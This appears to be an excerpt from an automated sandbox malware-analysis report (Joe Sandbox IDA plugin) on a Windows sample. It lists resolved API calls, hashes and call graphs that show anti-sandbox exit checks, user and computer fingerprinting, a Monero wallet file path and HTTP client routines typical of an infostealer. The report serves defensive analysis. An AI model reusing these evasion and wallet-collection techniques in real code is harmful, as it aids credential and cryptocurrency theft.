                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: 453f3a359d03786f7d35f922f500e3d2e9d279654fa38d1a7e4415702f521773
                                • Instruction ID: 44df43bc05b7bd7dd2d9be3f9429d910ea3f11a609bad2c7ab9ea2e20c034aef
                                • Opcode Fuzzy Hash: 453f3a359d03786f7d35f922f500e3d2e9d279654fa38d1a7e4415702f521773
                                • Instruction Fuzzy Hash: 3A0186B1A04208EFDB00DF94DD45FAABBB8F704B15F10421AF545E3280C37459048BA1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00D811B7), ref: 00D97880
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D97887
                                • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00D9789F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: c59a3191af30aeb1acfafba679dd5cecd95e3a311e0bfc1e71eb2c23b5d99c40
                                • Instruction ID: 17ecaabf1d6bb87b01dd48362603cecefbd46f50e32aa15fd899ead3b87fbc18
                                • Opcode Fuzzy Hash: c59a3191af30aeb1acfafba679dd5cecd95e3a311e0bfc1e71eb2c23b5d99c40
                                • Instruction Fuzzy Hash: C5F04FB1D4420CAFCB00DF99DE4AFAEBBB8FB04715F10025AFA05A3680C77865048BA1
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitInfoProcessSystem
                                • String ID:
                                • API String ID: 752954902-0
                                • Opcode ID: 0fcca09766275cbdfb78f1ee86af3117af6fab930dc845c84596fa4c290a1ecb
                                • Instruction ID: f0672c6e0d0638c840ad8a404af8178a14b08d1eec9a559d3bdc41a9f5720371
                                • Opcode Fuzzy Hash: 0fcca09766275cbdfb78f1ee86af3117af6fab930dc845c84596fa4c290a1ecb
                                • Instruction Fuzzy Hash: D2D0677490430C9BCB04ABA5998EA9DBBB8FB08615F101555D90562340EA3165968AA6

                                Control-flow Graph (figure; blocks marked as executed / not executed): basic blocks d99c10-d9a709 of the API-resolution function at 00D99C10. The graph consists of a chain of conditional blocks, each resolving a batch of imports via GetProcAddress (43, 5, 8, 5, 6, 9, 5, 2, 2, 10, 4, 1 and 4 calls per block), with one block calling LoadLibraryA 8 times.
                                APIs
                                • GetProcAddress.KERNEL32(74DD0000,01815850), ref: 00D99C2D
                                • GetProcAddress.KERNEL32(74DD0000,018159F0), ref: 00D99C45
                                • GetProcAddress.KERNEL32(74DD0000,018296B8), ref: 00D99C5E
                                • GetProcAddress.KERNEL32(74DD0000,018296D0), ref: 00D99C76
                                • GetProcAddress.KERNEL32(74DD0000,01829658), ref: 00D99C8E
                                • GetProcAddress.KERNEL32(74DD0000,01829610), ref: 00D99CA7
                                • GetProcAddress.KERNEL32(74DD0000,0181B6A8), ref: 00D99CBF
                                • GetProcAddress.KERNEL32(74DD0000,0182D290), ref: 00D99CD7
                                • GetProcAddress.KERNEL32(74DD0000,0182D218), ref: 00D99CF0
                                • GetProcAddress.KERNEL32(74DD0000,0182D230), ref: 00D99D08
                                • GetProcAddress.KERNEL32(74DD0000,0182D398), ref: 00D99D20
                                • GetProcAddress.KERNEL32(74DD0000,01815790), ref: 00D99D39
                                • GetProcAddress.KERNEL32(74DD0000,01815A10), ref: 00D99D51
                                • GetProcAddress.KERNEL32(74DD0000,018157B0), ref: 00D99D69
                                • GetProcAddress.KERNEL32(74DD0000,01815A30), ref: 00D99D82
                                • GetProcAddress.KERNEL32(74DD0000,0182D0F8), ref: 00D99D9A
                                • GetProcAddress.KERNEL32(74DD0000,0182D158), ref: 00D99DB2
                                • GetProcAddress.KERNEL32(74DD0000,0181B888), ref: 00D99DCB
                                • GetProcAddress.KERNEL32(74DD0000,018156F0), ref: 00D99DE3
                                • GetProcAddress.KERNEL32(74DD0000,0182D2D8), ref: 00D99DFB
                                • GetProcAddress.KERNEL32(74DD0000,0182D350), ref: 00D99E14
                                • GetProcAddress.KERNEL32(74DD0000,0182D2F0), ref: 00D99E2C
                                • GetProcAddress.KERNEL32(74DD0000,0182D3C8), ref: 00D99E44
                                • GetProcAddress.KERNEL32(74DD0000,01815A70), ref: 00D99E5D
                                • GetProcAddress.KERNEL32(74DD0000,0182D308), ref: 00D99E75
                                • GetProcAddress.KERNEL32(74DD0000,0182D338), ref: 00D99E8D
                                • GetProcAddress.KERNEL32(74DD0000,0182D278), ref: 00D99EA6
                                • GetProcAddress.KERNEL32(74DD0000,0182D248), ref: 00D99EBE
                                • GetProcAddress.KERNEL32(74DD0000,0182D1A0), ref: 00D99ED6
                                • GetProcAddress.KERNEL32(74DD0000,0182D188), ref: 00D99EEF
                                • GetProcAddress.KERNEL32(74DD0000,0182D260), ref: 00D99F07
                                • GetProcAddress.KERNEL32(74DD0000,0182D3E0), ref: 00D99F1F
                                • GetProcAddress.KERNEL32(74DD0000,0182D2A8), ref: 00D99F38
                                • GetProcAddress.KERNEL32(74DD0000,0182A4E0), ref: 00D99F50
                                • GetProcAddress.KERNEL32(74DD0000,0182D170), ref: 00D99F68
                                • GetProcAddress.KERNEL32(74DD0000,0182D110), ref: 00D99F81
                                • GetProcAddress.KERNEL32(74DD0000,018157F0), ref: 00D99F99
                                • GetProcAddress.KERNEL32(74DD0000,0182D320), ref: 00D99FB1
                                • GetProcAddress.KERNEL32(74DD0000,01815730), ref: 00D99FCA
                                • GetProcAddress.KERNEL32(74DD0000,0182D368), ref: 00D99FE2
                                • GetProcAddress.KERNEL32(74DD0000,0182D1E8), ref: 00D99FFA
                                • GetProcAddress.KERNEL32(74DD0000,018157D0), ref: 00D9A013
                                • GetProcAddress.KERNEL32(74DD0000,01815DB0), ref: 00D9A02B
                                • LoadLibraryA.KERNEL32(0182D380,?,00D95CA3,00DA0AEB,?,?,?,?,?,?,?,?,?,?,00DA0AEA,00DA0AE3), ref: 00D9A03D
                                • LoadLibraryA.KERNEL32(0182D1D0,?,00D95CA3,00DA0AEB,?,?,?,?,?,?,?,?,?,?,00DA0AEA,00DA0AE3), ref: 00D9A04E
                                • LoadLibraryA.KERNEL32(0182D2C0,?,00D95CA3,00DA0AEB,?,?,?,?,?,?,?,?,?,?,00DA0AEA,00DA0AE3), ref: 00D9A060
                                • LoadLibraryA.KERNEL32(0182D3B0,?,00D95CA3,00DA0AEB,?,?,?,?,?,?,?,?,?,?,00DA0AEA,00DA0AE3), ref: 00D9A072
                                • LoadLibraryA.KERNEL32(0182D128,?,00D95CA3,00DA0AEB,?,?,?,?,?,?,?,?,?,?,00DA0AEA,00DA0AE3), ref: 00D9A083
                                • LoadLibraryA.KERNEL32(0182D140,?,00D95CA3,00DA0AEB,?,?,?,?,?,?,?,?,?,?,00DA0AEA,00DA0AE3), ref: 00D9A095
                                • LoadLibraryA.KERNEL32(0182D1B8,?,00D95CA3,00DA0AEB,?,?,?,?,?,?,?,?,?,?,00DA0AEA,00DA0AE3), ref: 00D9A0A7
                                • LoadLibraryA.KERNEL32(0182D200,?,00D95CA3,00DA0AEB,?,?,?,?,?,?,?,?,?,?,00DA0AEA,00DA0AE3), ref: 00D9A0B8
                                • GetProcAddress.KERNEL32(75290000,01815E10), ref: 00D9A0DA
                                • GetProcAddress.KERNEL32(75290000,0182D410), ref: 00D9A0F2
                                • GetProcAddress.KERNEL32(75290000,01829068), ref: 00D9A10A
                                • GetProcAddress.KERNEL32(75290000,0182D3F8), ref: 00D9A123
                                • GetProcAddress.KERNEL32(75290000,01815CF0), ref: 00D9A13B
                                • GetProcAddress.KERNEL32(73440000,0181B810), ref: 00D9A160
                                • GetProcAddress.KERNEL32(73440000,01815CB0), ref: 00D9A179
                                • GetProcAddress.KERNEL32(73440000,0181B860), ref: 00D9A191
                                • GetProcAddress.KERNEL32(73440000,0182D4D0), ref: 00D9A1A9
                                • GetProcAddress.KERNEL32(73440000,0182D4E8), ref: 00D9A1C2
                                • GetProcAddress.KERNEL32(73440000,01815B50), ref: 00D9A1DA
                                • GetProcAddress.KERNEL32(73440000,01815AD0), ref: 00D9A1F2
                                • GetProcAddress.KERNEL32(73440000,0182D518), ref: 00D9A20B
                                • GetProcAddress.KERNEL32(752C0000,01815AB0), ref: 00D9A22C
                                • GetProcAddress.KERNEL32(752C0000,01815BD0), ref: 00D9A244
                                • GetProcAddress.KERNEL32(752C0000,0182D428), ref: 00D9A25D
                                • GetProcAddress.KERNEL32(752C0000,0182D500), ref: 00D9A275
                                • GetProcAddress.KERNEL32(752C0000,01815BF0), ref: 00D9A28D
                                • GetProcAddress.KERNEL32(74EC0000,0181B8B0), ref: 00D9A2B3
                                • GetProcAddress.KERNEL32(74EC0000,0181B838), ref: 00D9A2CB
                                • GetProcAddress.KERNEL32(74EC0000,0182D440), ref: 00D9A2E3
                                • GetProcAddress.KERNEL32(74EC0000,01815CD0), ref: 00D9A2FC
                                • GetProcAddress.KERNEL32(74EC0000,01815B70), ref: 00D9A314
                                • GetProcAddress.KERNEL32(74EC0000,0181BA68), ref: 00D9A32C
                                • GetProcAddress.KERNEL32(75BD0000,0182D578), ref: 00D9A352
                                • GetProcAddress.KERNEL32(75BD0000,01815B90), ref: 00D9A36A
                                • GetProcAddress.KERNEL32(75BD0000,01828F28), ref: 00D9A382
                                • GetProcAddress.KERNEL32(75BD0000,0182D488), ref: 00D9A39B
                                • GetProcAddress.KERNEL32(75BD0000,0182D4A0), ref: 00D9A3B3
                                • GetProcAddress.KERNEL32(75BD0000,01815D10), ref: 00D9A3CB
                                • GetProcAddress.KERNEL32(75BD0000,01815BB0), ref: 00D9A3E4
                                • GetProcAddress.KERNEL32(75BD0000,0182D4B8), ref: 00D9A3FC
                                • GetProcAddress.KERNEL32(75BD0000,0182D530), ref: 00D9A414
                                • GetProcAddress.KERNEL32(75A70000,01815C10), ref: 00D9A436
                                • GetProcAddress.KERNEL32(75A70000,0182D548), ref: 00D9A44E
                                • GetProcAddress.KERNEL32(75A70000,0182D560), ref: 00D9A466
                                • GetProcAddress.KERNEL32(75A70000,0182D458), ref: 00D9A47F
                                • GetProcAddress.KERNEL32(75A70000,0182D590), ref: 00D9A497
                                • GetProcAddress.KERNEL32(75450000,01815D30), ref: 00D9A4B8
                                • GetProcAddress.KERNEL32(75450000,01815DF0), ref: 00D9A4D1
                                • GetProcAddress.KERNEL32(75DA0000,01815AF0), ref: 00D9A4F2
                                • GetProcAddress.KERNEL32(75DA0000,0182D5A8), ref: 00D9A50A
                                • GetProcAddress.KERNEL32(6F070000,01815D70), ref: 00D9A530
                                • GetProcAddress.KERNEL32(6F070000,01815C30), ref: 00D9A548
                                • GetProcAddress.KERNEL32(6F070000,01815DD0), ref: 00D9A560
                                • GetProcAddress.KERNEL32(6F070000,0182D470), ref: 00D9A579
                                • GetProcAddress.KERNEL32(6F070000,01815D50), ref: 00D9A591
                                • GetProcAddress.KERNEL32(6F070000,01815C90), ref: 00D9A5A9
                                • GetProcAddress.KERNEL32(6F070000,01815D90), ref: 00D9A5C2
                                • GetProcAddress.KERNEL32(6F070000,01815E30), ref: 00D9A5DA
                                • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00D9A5F1
                                • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00D9A607
                                • GetProcAddress.KERNEL32(75AF0000,0182D098), ref: 00D9A629
                                • GetProcAddress.KERNEL32(75AF0000,01828F78), ref: 00D9A641
                                • GetProcAddress.KERNEL32(75AF0000,0182CF00), ref: 00D9A659
                                • GetProcAddress.KERNEL32(75AF0000,0182CFD8), ref: 00D9A672
                                • GetProcAddress.KERNEL32(75D90000,01815B10), ref: 00D9A693
                                • GetProcAddress.KERNEL32(6E460000,0182D0E0), ref: 00D9A6B4
                                • GetProcAddress.KERNEL32(6E460000,01815E50), ref: 00D9A6CD
                                • GetProcAddress.KERNEL32(6E460000,0182CFF0), ref: 00D9A6E5
                                • GetProcAddress.KERNEL32(6E460000,0182CF78), ref: 00D9A6FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: HttpQueryInfoA$InternetSetOptionA
                                • API String ID: 2238633743-1775429166
                                • Opcode ID: 748b6ab001c3c9d6d3eacdfb56cb2ae282620028988d3bff4b03c208746d76ea
                                • Instruction ID: 9469d133bfa8a8061d15005e8a1871c5a9c148f0efa731c6fd3298f29ed29713
                                • Opcode Fuzzy Hash: 748b6ab001c3c9d6d3eacdfb56cb2ae282620028988d3bff4b03c208746d76ea
                                • Instruction Fuzzy Hash: A3622AB650020CAFC344DFA8FF8AD5637F9FB8C609714851AA609C3264D639B851FF66

                                Control-flow Graph (figure; blocks marked as executed / not executed): basic blocks d86280-d8652d of the function at 00D86280. API calls shown in the graph: InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA, HttpSendRequestA, HttpQueryInfoA, InternetReadFile, InternetCloseHandle. Internal subcalls shown: d9a7a0, d847b0, d9a740, d9a800, d98940, d9a9b0, d9a8a0.
                                APIs
                                  • Part of subcall function 00D9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D9A7E6
                                  • Part of subcall function 00D847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D84839
                                  • Part of subcall function 00D847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D84849
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                • InternetOpenA.WININET(00DA0DFE,00000001,00000000,00000000,00000000), ref: 00D862E1
                                • StrCmpCA.SHLWAPI(?,0182EB68), ref: 00D86303
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D86335
                                • HttpOpenRequestA.WININET(00000000,GET,?,0182E1B0,00000000,00000000,00400100,00000000), ref: 00D86385
                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00D863BF
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D863D1
                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00D863FD
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00D8646D
                                • InternetCloseHandle.WININET(00000000), ref: 00D864EF
                                • InternetCloseHandle.WININET(00000000), ref: 00D864F9
                                • InternetCloseHandle.WININET(00000000), ref: 00D86503
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Similarity
                                • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                • String ID: ERROR$ERROR$GET
                                • API String ID: 3749127164-2509457195

                                Control-flow Graph for the function at d95510 (rendered graph omitted; nodes were marked Executed / Not Executed)
                                APIs
                                  • Part of subcall function 00D9A820: lstrlen.KERNEL32(00D84F05,?,?,00D84F05,00DA0DDE), ref: 00D9A82B
                                  • Part of subcall function 00D9A820: lstrcpy.KERNEL32(00DA0DDE,00000000), ref: 00D9A885
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D95644
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D956A1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D95857
                                  • Part of subcall function 00D9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D9A7E6
                                  • Part of subcall function 00D951F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D95228
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                  • Part of subcall function 00D952C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D95318
                                  • Part of subcall function 00D952C0: lstrlen.KERNEL32(00000000), ref: 00D9532F
                                  • Part of subcall function 00D952C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00D95364
                                  • Part of subcall function 00D952C0: lstrlen.KERNEL32(00000000), ref: 00D95383
                                  • Part of subcall function 00D952C0: lstrlen.KERNEL32(00000000), ref: 00D953AE
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D9578B
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D95940
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D95A0C
                                • Sleep.KERNEL32(0000EA60), ref: 00D95A1B
                                Similarity
                                • API ID: lstrcpylstrlen$Sleep
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 507064821-2791005934

                                Control-flow Graph for the function at d917a0 (rendered graph omitted; nodes were marked Executed / Not Executed)
                                APIs
                                • StrCmpCA.SHLWAPI(00000000,block), ref: 00D917C5
                                • ExitProcess.KERNEL32 ref: 00D917D1
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458

                                Control-flow Graph for the function at d97500 (rendered graph omitted; nodes were marked Executed / Not Executed)
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00D97542
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D9757F
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D97603
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D9760A
                                • wsprintfA.USER32 ref: 00D97640
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                • String ID: :$C$\
                                • API String ID: 1544550907-3809124531

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00D99860: GetProcAddress.KERNEL32(74DD0000,018224A0), ref: 00D998A1
                                  • Part of subcall function 00D99860: GetProcAddress.KERNEL32(74DD0000,018224B8), ref: 00D998BA
                                  • Part of subcall function 00D99860: GetProcAddress.KERNEL32(74DD0000,018223B0), ref: 00D998D2
                                  • Part of subcall function 00D99860: GetProcAddress.KERNEL32(74DD0000,018224D0), ref: 00D998EA
                                  • Part of subcall function 00D99860: GetProcAddress.KERNEL32(74DD0000,01822350), ref: 00D99903
                                  • Part of subcall function 00D99860: GetProcAddress.KERNEL32(74DD0000,01829018), ref: 00D9991B
                                  • Part of subcall function 00D99860: GetProcAddress.KERNEL32(74DD0000,018158B0), ref: 00D99933
                                  • Part of subcall function 00D99860: GetProcAddress.KERNEL32(74DD0000,01815830), ref: 00D9994C
                                  • Part of subcall function 00D99860: GetProcAddress.KERNEL32(74DD0000,01822218), ref: 00D99964
                                  • Part of subcall function 00D99860: GetProcAddress.KERNEL32(74DD0000,01822308), ref: 00D9997C
                                  • Part of subcall function 00D99860: GetProcAddress.KERNEL32(74DD0000,01822500), ref: 00D99995
                                  • Part of subcall function 00D99860: GetProcAddress.KERNEL32(74DD0000,01822320), ref: 00D999AD
                                  • Part of subcall function 00D99860: GetProcAddress.KERNEL32(74DD0000,018158D0), ref: 00D999C5
                                  • Part of subcall function 00D99860: GetProcAddress.KERNEL32(74DD0000,01822230), ref: 00D999DE
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D811D0: ExitProcess.KERNEL32 ref: 00D81211
                                  • Part of subcall function 00D81160: GetSystemInfo.KERNEL32(?), ref: 00D8116A
                                  • Part of subcall function 00D81160: ExitProcess.KERNEL32 ref: 00D8117E
                                  • Part of subcall function 00D81110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00D8112B
                                  • Part of subcall function 00D81110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00D81132
                                  • Part of subcall function 00D81110: ExitProcess.KERNEL32 ref: 00D81143
                                  • Part of subcall function 00D81220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00D8123E
                                  • Part of subcall function 00D81220: __aulldiv.LIBCMT ref: 00D81258
                                  • Part of subcall function 00D81220: __aulldiv.LIBCMT ref: 00D81266
                                  • Part of subcall function 00D81220: ExitProcess.KERNEL32 ref: 00D81294
                                  • Part of subcall function 00D96770: GetUserDefaultLangID.KERNEL32 ref: 00D96774
                                  • Part of subcall function 00D81190: ExitProcess.KERNEL32 ref: 00D811C6
                                  • Part of subcall function 00D97850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00D811B7), ref: 00D97880
                                  • Part of subcall function 00D97850: RtlAllocateHeap.NTDLL(00000000), ref: 00D97887
                                  • Part of subcall function 00D97850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00D9789F
                                  • Part of subcall function 00D978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D97910
                                  • Part of subcall function 00D978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00D97917
                                  • Part of subcall function 00D978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00D9792F
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,018290F8,?,00DA110C,?,00000000,?,00DA1110,?,00000000,00DA0AEF), ref: 00D96ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D96AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00D96AF9
                                • Sleep.KERNEL32(00001770), ref: 00D96B04
                                • CloseHandle.KERNEL32(?,00000000,?,018290F8,?,00DA110C,?,00000000,?,00DA1110,?,00000000,00DA0AEF), ref: 00D96B1A
                                • ExitProcess.KERNEL32 ref: 00D96B22
                                Similarity
                                • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                • String ID:
                                • API String ID: 2525456742-0

                                Control-flow Graph for the function at d81220 (rendered graph omitted; nodes were marked Executed / Not Executed)
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00D8123E
                                • __aulldiv.LIBCMT ref: 00D81258
                                • __aulldiv.LIBCMT ref: 00D81266
                                • ExitProcess.KERNEL32 ref: 00D81294
                                Similarity
                                • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 3404098578-2766056989
                                • Opcode ID: 6ae3d48eb1fcf434db05d6d7da9627a86b639bc92fa0452ddd2d3cf518f83d6f
                                • Instruction ID: 08a34d9b1193ae54c4827074737d28b63489c76b6d6e6cb715549feb1a906689
                                • Opcode Fuzzy Hash: 6ae3d48eb1fcf434db05d6d7da9627a86b639bc92fa0452ddd2d3cf518f83d6f
                                • Instruction Fuzzy Hash: 1F01FFB4944308BADF10EBE4CD4AFADB778EB14705F248144E605B6180D6749545876D

                                Control-flow Graph

